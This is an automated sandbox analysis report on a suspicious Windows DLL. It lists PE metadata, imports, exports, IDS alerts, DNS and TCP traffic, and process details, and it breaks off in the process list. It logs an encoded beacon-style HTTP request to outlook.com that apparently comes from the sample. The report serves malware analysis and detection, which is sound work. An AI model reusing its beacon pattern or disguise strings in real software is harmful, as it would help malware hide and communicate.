IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x7a980	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x6b000	0x1ac	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6988d	0x69a00	False	0.70416512574	data	6.62140187581	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x6b000	0x115e0	0x11600	False	0.471967738309	data	5.23669501131	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7d000	0x113300	0x1800	False	0.333984375	data	3.88700180982	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x191000	0x498	0x600	False	0.356119791667	data	2.99935790597	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x192000	0x2818	0x2a00	False	0.743117559524	data	6.59705049508	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x1910a0	0x35c	data	English	United States
RT_MANIFEST	0x191400	0x91	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetEnvironmentVariableA, SetStdHandle, SetFilePointerEx, WriteConsoleW, CloseHandle, GetFileAttributesW, GetWindowsDirectoryW, CreateProcessW, OpenMutexW, VirtualProtectEx, EncodePointer, DecodePointer, HeapAlloc, GetSystemTimeAsFileTime, RaiseException, RtlUnwind, GetCommandLineA, GetCurrentThreadId, IsProcessorFeaturePresent, GetLastError, HeapFree, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, MultiByteToWideChar, WideCharToMultiByte, HeapSize, GetStdHandle, WriteFile, GetModuleFileNameW, GetProcessHeap, IsDebuggerPresent, GetTimeZoneInformation, SetLastError, GetCurrentThread, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, CreateEventW, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetTickCount, GetModuleHandleW, CreateSemaphoreW, SetConsoleCtrlHandler, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, EnterCriticalSection, LeaveCriticalSection, FatalAppExitA, FreeLibrary, LoadLibraryExW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, HeapReAlloc, OutputDebugStringW, GetStringTypeW, CreateFileW
USER32.dll	GetPropW, CreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW
GDI32.dll	MoveToEx, SetTextColor, SetBkMode, SetBkColor, LineTo, IntersectClipRect, GetClipBox, GetCharWidthW, CreateBitmap
COMCTL32.dll	ImageList_SetDragCursorImage, ImageList_Draw, PropertySheetW, CreatePropertySheetPageA

Exports

Name	Ordinal	Address
Enterbeen	1	0x1047ed0
Multiply	2	0x1047fb0

Version Infos

Description	Data
LegalCopyright	Fingergeneral Corporation. All rights reserved
InternalName	Probable
FileVersion	5.5.2.216 Sidedone
CompanyName	Fingergeneral Corporation
ProductName	Fingergeneral Wear twenty
ProductVersion	5.5.2.216
FileDescription	Fingergeneral Wear twenty
OriginalFilename	turn.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
05/04/21-18:52:29.692083	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:52:29.727060	ICMP	449	ICMP Time-To-Live Exceeded in Transit	84.17.52.126	192.168.2.6
05/04/21-18:52:29.727454	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:52:29.763162	ICMP	449	ICMP Time-To-Live Exceeded in Transit	149.11.89.129	192.168.2.6
05/04/21-18:52:29.763557	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:52:29.799375	ICMP	449	ICMP Time-To-Live Exceeded in Transit	130.117.49.165	192.168.2.6
05/04/21-18:52:29.800094	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:52:29.840838	ICMP	449	ICMP Time-To-Live Exceeded in Transit	130.117.0.18	192.168.2.6
05/04/21-18:52:29.841596	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:52:29.888178	ICMP	449	ICMP Time-To-Live Exceeded in Transit	154.54.36.53	192.168.2.6
05/04/21-18:52:29.888557	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:52:29.935589	ICMP	449	ICMP Time-To-Live Exceeded in Transit	154.54.56.190	192.168.2.6
05/04/21-18:52:29.936007	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:52:29.981493	ICMP	449	ICMP Time-To-Live Exceeded in Transit	4.68.37.93	192.168.2.6
05/04/21-18:52:29.981978	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:52:33.661732	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:52:37.677969	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:52:41.678428	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:52:46.273239	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:52:50.163683	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:52:54.183288	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:52:58.210718	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:53:02.180671	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:53:06.166018	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:53:10.165814	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:53:14.165998	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:53:18.170708	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:53:22.187264	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:53:26.185740	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:53:30.169625	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:53:34.182432	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:53:38.621192	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:53:42.637472	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:53:46.627649	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:53:50.623633	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:53:54.618741	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:53:59.048851	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:54:02.619742	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:54:06.619825	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:54:10.620244	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:54:14.620372	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:54:18.627035	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:54:22.627997	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:54:26.622060	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:54:30.622421	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:54:34.623800	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:54:38.622781	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126
05/04/21-18:54:42.626771	ICMP	384	ICMP PING	192.168.2.6	8.238.27.126

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 18:54:06.545804977 CEST	49725	80	192.168.2.6	40.97.128.194
May 4, 2021 18:54:06.545804024 CEST	49726	80	192.168.2.6	40.97.128.194
May 4, 2021 18:54:06.689771891 CEST	80	49726	40.97.128.194	192.168.2.6
May 4, 2021 18:54:06.689989090 CEST	49726	80	192.168.2.6	40.97.128.194
May 4, 2021 18:54:06.690716028 CEST	49726	80	192.168.2.6	40.97.128.194
May 4, 2021 18:54:06.691628933 CEST	80	49725	40.97.128.194	192.168.2.6
May 4, 2021 18:54:06.691734076 CEST	49725	80	192.168.2.6	40.97.128.194
May 4, 2021 18:54:06.838143110 CEST	80	49726	40.97.128.194	192.168.2.6
May 4, 2021 18:54:06.838278055 CEST	49726	80	192.168.2.6	40.97.128.194
May 4, 2021 18:54:06.838489056 CEST	49726	80	192.168.2.6	40.97.128.194
May 4, 2021 18:54:06.846282005 CEST	49727	443	192.168.2.6	40.97.128.194
May 4, 2021 18:54:06.982461929 CEST	80	49726	40.97.128.194	192.168.2.6
May 4, 2021 18:54:06.992594004 CEST	443	49727	40.97.128.194	192.168.2.6
May 4, 2021 18:54:06.992799997 CEST	49727	443	192.168.2.6	40.97.128.194
May 4, 2021 18:54:07.001812935 CEST	49727	443	192.168.2.6	40.97.128.194
May 4, 2021 18:54:07.150540113 CEST	443	49727	40.97.128.194	192.168.2.6
May 4, 2021 18:54:07.150578022 CEST	443	49727	40.97.128.194	192.168.2.6
May 4, 2021 18:54:07.150607109 CEST	443	49727	40.97.128.194	192.168.2.6
May 4, 2021 18:54:07.150631905 CEST	49727	443	192.168.2.6	40.97.128.194
May 4, 2021 18:54:07.150660038 CEST	49727	443	192.168.2.6	40.97.128.194
May 4, 2021 18:54:07.188564062 CEST	49727	443	192.168.2.6	40.97.128.194
May 4, 2021 18:54:07.195911884 CEST	49727	443	192.168.2.6	40.97.128.194
May 4, 2021 18:54:07.338144064 CEST	443	49727	40.97.128.194	192.168.2.6
May 4, 2021 18:54:07.338247061 CEST	49727	443	192.168.2.6	40.97.128.194
May 4, 2021 18:54:07.346502066 CEST	443	49727	40.97.128.194	192.168.2.6
May 4, 2021 18:54:07.346637011 CEST	49727	443	192.168.2.6	40.97.128.194
May 4, 2021 18:54:07.347060919 CEST	49727	443	192.168.2.6	40.97.128.194
May 4, 2021 18:54:07.414005995 CEST	49728	443	192.168.2.6	52.97.150.2
May 4, 2021 18:54:07.414077997 CEST	49729	443	192.168.2.6	52.97.150.2
May 4, 2021 18:54:07.463756084 CEST	443	49729	52.97.150.2	192.168.2.6
May 4, 2021 18:54:07.463836908 CEST	443	49728	52.97.150.2	192.168.2.6
May 4, 2021 18:54:07.463890076 CEST	49729	443	192.168.2.6	52.97.150.2
May 4, 2021 18:54:07.463932991 CEST	49728	443	192.168.2.6	52.97.150.2
May 4, 2021 18:54:07.464896917 CEST	49729	443	192.168.2.6	52.97.150.2
May 4, 2021 18:54:07.465254068 CEST	49728	443	192.168.2.6	52.97.150.2
May 4, 2021 18:54:07.492871046 CEST	443	49727	40.97.128.194	192.168.2.6
May 4, 2021 18:54:07.514828920 CEST	443	49729	52.97.150.2	192.168.2.6
May 4, 2021 18:54:07.514866114 CEST	443	49729	52.97.150.2	192.168.2.6
May 4, 2021 18:54:07.514894009 CEST	443	49729	52.97.150.2	192.168.2.6
May 4, 2021 18:54:07.514909029 CEST	443	49728	52.97.150.2	192.168.2.6
May 4, 2021 18:54:07.514928102 CEST	443	49728	52.97.150.2	192.168.2.6
May 4, 2021 18:54:07.514945030 CEST	443	49728	52.97.150.2	192.168.2.6
May 4, 2021 18:54:07.515085936 CEST	49729	443	192.168.2.6	52.97.150.2
May 4, 2021 18:54:07.515105963 CEST	49728	443	192.168.2.6	52.97.150.2
May 4, 2021 18:54:07.515187025 CEST	49728	443	192.168.2.6	52.97.150.2
May 4, 2021 18:54:07.525580883 CEST	49729	443	192.168.2.6	52.97.150.2
May 4, 2021 18:54:07.525724888 CEST	49728	443	192.168.2.6	52.97.150.2
May 4, 2021 18:54:07.526541948 CEST	49728	443	192.168.2.6	52.97.150.2
May 4, 2021 18:54:07.575365067 CEST	443	49728	52.97.150.2	192.168.2.6
May 4, 2021 18:54:07.575416088 CEST	443	49728	52.97.150.2	192.168.2.6
May 4, 2021 18:54:07.575449944 CEST	443	49729	52.97.150.2	192.168.2.6
May 4, 2021 18:54:07.575480938 CEST	49728	443	192.168.2.6	52.97.150.2
May 4, 2021 18:54:07.575510979 CEST	49729	443	192.168.2.6	52.97.150.2
May 4, 2021 18:54:07.578187943 CEST	443	49728	52.97.150.2	192.168.2.6
May 4, 2021 18:54:07.578321934 CEST	49728	443	192.168.2.6	52.97.150.2
May 4, 2021 18:54:07.578660965 CEST	49728	443	192.168.2.6	52.97.150.2
May 4, 2021 18:54:07.627228022 CEST	443	49728	52.97.150.2	192.168.2.6
May 4, 2021 18:54:07.639496088 CEST	49730	443	192.168.2.6	52.97.201.82
May 4, 2021 18:54:07.639502048 CEST	49731	443	192.168.2.6	52.97.201.82
May 4, 2021 18:54:07.686299086 CEST	443	49730	52.97.201.82	192.168.2.6
May 4, 2021 18:54:07.686391115 CEST	49730	443	192.168.2.6	52.97.201.82
May 4, 2021 18:54:07.687308073 CEST	49730	443	192.168.2.6	52.97.201.82
May 4, 2021 18:54:07.692817926 CEST	443	49731	52.97.201.82	192.168.2.6
May 4, 2021 18:54:07.693005085 CEST	49731	443	192.168.2.6	52.97.201.82
May 4, 2021 18:54:07.703771114 CEST	49731	443	192.168.2.6	52.97.201.82
May 4, 2021 18:54:07.734812975 CEST	443	49730	52.97.201.82	192.168.2.6
May 4, 2021 18:54:07.734844923 CEST	443	49730	52.97.201.82	192.168.2.6
May 4, 2021 18:54:07.734864950 CEST	443	49730	52.97.201.82	192.168.2.6
May 4, 2021 18:54:07.735014915 CEST	49730	443	192.168.2.6	52.97.201.82
May 4, 2021 18:54:07.745953083 CEST	49730	443	192.168.2.6	52.97.201.82
May 4, 2021 18:54:07.746764898 CEST	49730	443	192.168.2.6	52.97.201.82
May 4, 2021 18:54:07.757808924 CEST	443	49731	52.97.201.82	192.168.2.6
May 4, 2021 18:54:07.757838011 CEST	443	49731	52.97.201.82	192.168.2.6
May 4, 2021 18:54:07.757853985 CEST	443	49731	52.97.201.82	192.168.2.6
May 4, 2021 18:54:07.757935047 CEST	49731	443	192.168.2.6	52.97.201.82
May 4, 2021 18:54:07.758002996 CEST	49731	443	192.168.2.6	52.97.201.82
May 4, 2021 18:54:07.764975071 CEST	49731	443	192.168.2.6	52.97.201.82
May 4, 2021 18:54:07.793373108 CEST	443	49730	52.97.201.82	192.168.2.6
May 4, 2021 18:54:07.793854952 CEST	443	49730	52.97.201.82	192.168.2.6
May 4, 2021 18:54:07.793988943 CEST	49730	443	192.168.2.6	52.97.201.82
May 4, 2021 18:54:07.799103975 CEST	443	49730	52.97.201.82	192.168.2.6
May 4, 2021 18:54:07.799125910 CEST	443	49730	52.97.201.82	192.168.2.6
May 4, 2021 18:54:07.799235106 CEST	49730	443	192.168.2.6	52.97.201.82
May 4, 2021 18:54:07.819248915 CEST	443	49731	52.97.201.82	192.168.2.6
May 4, 2021 18:54:07.819401026 CEST	49731	443	192.168.2.6	52.97.201.82
May 4, 2021 18:54:08.096868038 CEST	443	49731	52.97.201.82	192.168.2.6
May 4, 2021 18:54:08.097042084 CEST	49731	443	192.168.2.6	52.97.201.82
May 4, 2021 18:54:08.861166954 CEST	49725	80	192.168.2.6	40.97.128.194
May 4, 2021 18:54:08.861208916 CEST	49730	443	192.168.2.6	52.97.201.82
May 4, 2021 18:54:08.861330986 CEST	49729	443	192.168.2.6	52.97.150.2
May 4, 2021 18:54:08.861331940 CEST	49731	443	192.168.2.6	52.97.201.82

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 18:52:22.970918894 CEST	63791	53	192.168.2.6	8.8.8.8
May 4, 2021 18:52:23.019690037 CEST	53	63791	8.8.8.8	192.168.2.6
May 4, 2021 18:52:23.403167009 CEST	64267	53	192.168.2.6	8.8.8.8
May 4, 2021 18:52:23.463300943 CEST	53	64267	8.8.8.8	192.168.2.6
May 4, 2021 18:52:24.167635918 CEST	49448	53	192.168.2.6	8.8.8.8
May 4, 2021 18:52:24.216428041 CEST	53	49448	8.8.8.8	192.168.2.6
May 4, 2021 18:52:24.945031881 CEST	60342	53	192.168.2.6	8.8.8.8
May 4, 2021 18:52:24.996774912 CEST	53	60342	8.8.8.8	192.168.2.6
May 4, 2021 18:52:26.020801067 CEST	61346	53	192.168.2.6	8.8.8.8
May 4, 2021 18:52:26.069710016 CEST	53	61346	8.8.8.8	192.168.2.6
May 4, 2021 18:52:27.312602997 CEST	51774	53	192.168.2.6	8.8.8.8
May 4, 2021 18:52:27.361246109 CEST	53	51774	8.8.8.8	192.168.2.6
May 4, 2021 18:52:28.160480022 CEST	56023	53	192.168.2.6	8.8.8.8
May 4, 2021 18:52:28.209218025 CEST	53	56023	8.8.8.8	192.168.2.6
May 4, 2021 18:52:29.012883902 CEST	58384	53	192.168.2.6	8.8.8.8
May 4, 2021 18:52:29.072856903 CEST	53	58384	8.8.8.8	192.168.2.6
May 4, 2021 18:52:29.475900888 CEST	60261	53	192.168.2.6	8.8.8.8
May 4, 2021 18:52:29.690892935 CEST	53	60261	8.8.8.8	192.168.2.6
May 4, 2021 18:52:29.991524935 CEST	56061	53	192.168.2.6	8.8.8.8
May 4, 2021 18:52:30.040215015 CEST	53	56061	8.8.8.8	192.168.2.6
May 4, 2021 18:52:30.890821934 CEST	58336	53	192.168.2.6	8.8.8.8
May 4, 2021 18:52:30.939558983 CEST	53	58336	8.8.8.8	192.168.2.6
May 4, 2021 18:53:22.466109037 CEST	53781	53	192.168.2.6	8.8.8.8
May 4, 2021 18:53:22.523046017 CEST	53	53781	8.8.8.8	192.168.2.6
May 4, 2021 18:53:23.511240959 CEST	54064	53	192.168.2.6	8.8.8.8
May 4, 2021 18:53:23.568932056 CEST	53	54064	8.8.8.8	192.168.2.6
May 4, 2021 18:53:49.129221916 CEST	52811	53	192.168.2.6	8.8.8.8
May 4, 2021 18:53:49.194948912 CEST	53	52811	8.8.8.8	192.168.2.6
May 4, 2021 18:53:49.752892971 CEST	55299	53	192.168.2.6	8.8.8.8
May 4, 2021 18:53:49.804584980 CEST	53	55299	8.8.8.8	192.168.2.6
May 4, 2021 18:53:52.110009909 CEST	63745	53	192.168.2.6	8.8.8.8
May 4, 2021 18:53:52.170139074 CEST	53	63745	8.8.8.8	192.168.2.6
May 4, 2021 18:54:02.225565910 CEST	50055	53	192.168.2.6	8.8.8.8
May 4, 2021 18:54:02.287480116 CEST	53	50055	8.8.8.8	192.168.2.6
May 4, 2021 18:54:05.205369949 CEST	61374	53	192.168.2.6	8.8.8.8
May 4, 2021 18:54:05.264559984 CEST	53	61374	8.8.8.8	192.168.2.6
May 4, 2021 18:54:06.474169970 CEST	50339	53	192.168.2.6	8.8.8.8
May 4, 2021 18:54:06.525335073 CEST	53	50339	8.8.8.8	192.168.2.6
May 4, 2021 18:54:07.356297970 CEST	63307	53	192.168.2.6	8.8.8.8
May 4, 2021 18:54:07.405424118 CEST	53	63307	8.8.8.8	192.168.2.6
May 4, 2021 18:54:07.588264942 CEST	49694	53	192.168.2.6	8.8.8.8
May 4, 2021 18:54:07.637008905 CEST	53	49694	8.8.8.8	192.168.2.6
May 4, 2021 18:54:25.366008043 CEST	54982	53	192.168.2.6	8.8.8.8
May 4, 2021 18:54:25.414696932 CEST	53	54982	8.8.8.8	192.168.2.6
May 4, 2021 18:54:32.429203033 CEST	50010	53	192.168.2.6	8.8.8.8
May 4, 2021 18:54:33.435081959 CEST	50010	53	192.168.2.6	8.8.8.8
May 4, 2021 18:54:33.497840881 CEST	53	50010	8.8.8.8	192.168.2.6
May 4, 2021 18:54:35.170659065 CEST	63718	53	192.168.2.6	8.8.8.8
May 4, 2021 18:54:35.219465971 CEST	53	63718	8.8.8.8	192.168.2.6
May 4, 2021 18:54:36.184983969 CEST	63718	53	192.168.2.6	8.8.8.8
May 4, 2021 18:54:36.233985901 CEST	53	63718	8.8.8.8	192.168.2.6
May 4, 2021 18:54:37.201193094 CEST	63718	53	192.168.2.6	8.8.8.8
May 4, 2021 18:54:37.249866962 CEST	53	63718	8.8.8.8	192.168.2.6
May 4, 2021 18:54:39.216440916 CEST	63718	53	192.168.2.6	8.8.8.8
May 4, 2021 18:54:39.265095949 CEST	53	63718	8.8.8.8	192.168.2.6
May 4, 2021 18:54:40.336675882 CEST	62116	53	192.168.2.6	8.8.8.8
May 4, 2021 18:54:40.486478090 CEST	53	62116	8.8.8.8	192.168.2.6
May 4, 2021 18:54:41.825098038 CEST	63816	53	192.168.2.6	8.8.8.8
May 4, 2021 18:54:42.024085999 CEST	53	63816	8.8.8.8	192.168.2.6
May 4, 2021 18:54:42.507457018 CEST	55014	53	192.168.2.6	8.8.8.8
May 4, 2021 18:54:42.566903114 CEST	53	55014	8.8.8.8	192.168.2.6
May 4, 2021 18:54:43.000472069 CEST	62208	53	192.168.2.6	8.8.8.8
May 4, 2021 18:54:43.051908016 CEST	53	62208	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 4, 2021 18:54:06.474169970 CEST	192.168.2.6	8.8.8.8	0xc384	Standard query (0)	outlook.com	A (IP address)	IN (0x0001)
May 4, 2021 18:54:07.356297970 CEST	192.168.2.6	8.8.8.8	0x97c4	Standard query (0)	www.outlook.com	A (IP address)	IN (0x0001)
May 4, 2021 18:54:07.588264942 CEST	192.168.2.6	8.8.8.8	0x3bca	Standard query (0)	outlook.office365.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 4, 2021 18:53:49.194948912 CEST	8.8.8.8	192.168.2.6	0x7009	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 18:54:06.525335073 CEST	8.8.8.8	192.168.2.6	0xc384	No error (0)	outlook.com		40.97.128.194	A (IP address)	IN (0x0001)
May 4, 2021 18:54:06.525335073 CEST	8.8.8.8	192.168.2.6	0xc384	No error (0)	outlook.com		40.97.156.114	A (IP address)	IN (0x0001)
May 4, 2021 18:54:06.525335073 CEST	8.8.8.8	192.168.2.6	0xc384	No error (0)	outlook.com		40.97.153.146	A (IP address)	IN (0x0001)
May 4, 2021 18:54:06.525335073 CEST	8.8.8.8	192.168.2.6	0xc384	No error (0)	outlook.com		40.97.161.50	A (IP address)	IN (0x0001)
May 4, 2021 18:54:06.525335073 CEST	8.8.8.8	192.168.2.6	0xc384	No error (0)	outlook.com		40.97.116.82	A (IP address)	IN (0x0001)
May 4, 2021 18:54:06.525335073 CEST	8.8.8.8	192.168.2.6	0xc384	No error (0)	outlook.com		40.97.160.2	A (IP address)	IN (0x0001)
May 4, 2021 18:54:06.525335073 CEST	8.8.8.8	192.168.2.6	0xc384	No error (0)	outlook.com		40.97.148.226	A (IP address)	IN (0x0001)
May 4, 2021 18:54:06.525335073 CEST	8.8.8.8	192.168.2.6	0xc384	No error (0)	outlook.com		40.97.164.146	A (IP address)	IN (0x0001)
May 4, 2021 18:54:07.405424118 CEST	8.8.8.8	192.168.2.6	0x97c4	No error (0)	www.outlook.com	outlook.office365.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 18:54:07.405424118 CEST	8.8.8.8	192.168.2.6	0x97c4	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 18:54:07.405424118 CEST	8.8.8.8	192.168.2.6	0x97c4	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 18:54:07.405424118 CEST	8.8.8.8	192.168.2.6	0x97c4	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 18:54:07.405424118 CEST	8.8.8.8	192.168.2.6	0x97c4	No error (0)	HHN-efz.ms-acdc.office.com		52.97.150.2	A (IP address)	IN (0x0001)
May 4, 2021 18:54:07.405424118 CEST	8.8.8.8	192.168.2.6	0x97c4	No error (0)	HHN-efz.ms-acdc.office.com		40.101.137.18	A (IP address)	IN (0x0001)
May 4, 2021 18:54:07.405424118 CEST	8.8.8.8	192.168.2.6	0x97c4	No error (0)	HHN-efz.ms-acdc.office.com		52.97.233.18	A (IP address)	IN (0x0001)
May 4, 2021 18:54:07.405424118 CEST	8.8.8.8	192.168.2.6	0x97c4	No error (0)	HHN-efz.ms-acdc.office.com		40.101.137.50	A (IP address)	IN (0x0001)
May 4, 2021 18:54:07.637008905 CEST	8.8.8.8	192.168.2.6	0x3bca	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 18:54:07.637008905 CEST	8.8.8.8	192.168.2.6	0x3bca	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 18:54:07.637008905 CEST	8.8.8.8	192.168.2.6	0x3bca	No error (0)	outlook.ms-acdc.office.com	FRA-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 18:54:07.637008905 CEST	8.8.8.8	192.168.2.6	0x3bca	No error (0)	FRA-efz.ms-acdc.office.com		52.97.201.82	A (IP address)	IN (0x0001)
May 4, 2021 18:54:07.637008905 CEST	8.8.8.8	192.168.2.6	0x3bca	No error (0)	FRA-efz.ms-acdc.office.com		52.97.144.2	A (IP address)	IN (0x0001)
May 4, 2021 18:54:07.637008905 CEST	8.8.8.8	192.168.2.6	0x3bca	No error (0)	FRA-efz.ms-acdc.office.com		52.97.170.34	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

outlook.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49726	40.97.128.194	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
May 4, 2021 18:54:06.690716028 CEST	1192	OUT	GET /login/greed/dTdjBCYANBp89r_2BxCJb/gK6KRSDvLFl65FiM/sVGCJkg_2FiGctf/t6MCq4h_2BQjlakLCK/wiH0Ze_2B/jucB0Ra6kWTVhbib9MO1/jbq6SBoLka4DWlxdGWZ/y4sF0OuALvDiDjUoj2_2B_/2FCnNAucowWTY/QocXWkvP/dNKrsXhuwJ0UrXUCqZRpNCx/r6rZ7E04g_/2B8ZRdIhu4yR4YZKp/tqA3A0JYvM/21FVchV.gfk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: outlook.com Connection: Keep-Alive
May 4, 2021 18:54:06.838143110 CEST	1192	IN	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Pragma: no-cache Location: https://outlook.com/login/greed/dTdjBCYANBp89r_2BxCJb/gK6KRSDvLFl65FiM/sVGCJkg_2FiGctf/t6MCq4h_2BQjlakLCK/wiH0Ze_2B/jucB0Ra6kWTVhbib9MO1/jbq6SBoLka4DWlxdGWZ/y4sF0OuALvDiDjUoj2_2B_/2FCnNAucowWTY/QocXWkvP/dNKrsXhuwJ0UrXUCqZRpNCx/r6rZ7E04g_/2B8ZRdIhu4yR4YZKp/tqA3A0JYvM/21FVchV.gfk Server: Microsoft-IIS/10.0 request-id: 8a3df280-21c9-49ae-91ea-af755b4bfa8a X-FEServer: DM5PR2201CA0020 X-RequestId: 90931448-0ba3-4c8d-8c41-ca4c654f378b X-Powered-By: ASP.NET X-FEServer: DM5PR2201CA0020 Date: Tue, 04 May 2021 16:54:06 GMT Connection: close Content-Length: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6684 Parent PID: 5920

General

Start time:	18:52:30
Start date:	04/05/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\iJdlvBxhYu.dll'
Imagebase:	0xa50000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6692 Parent PID: 6684

General

Start time:	18:52:30
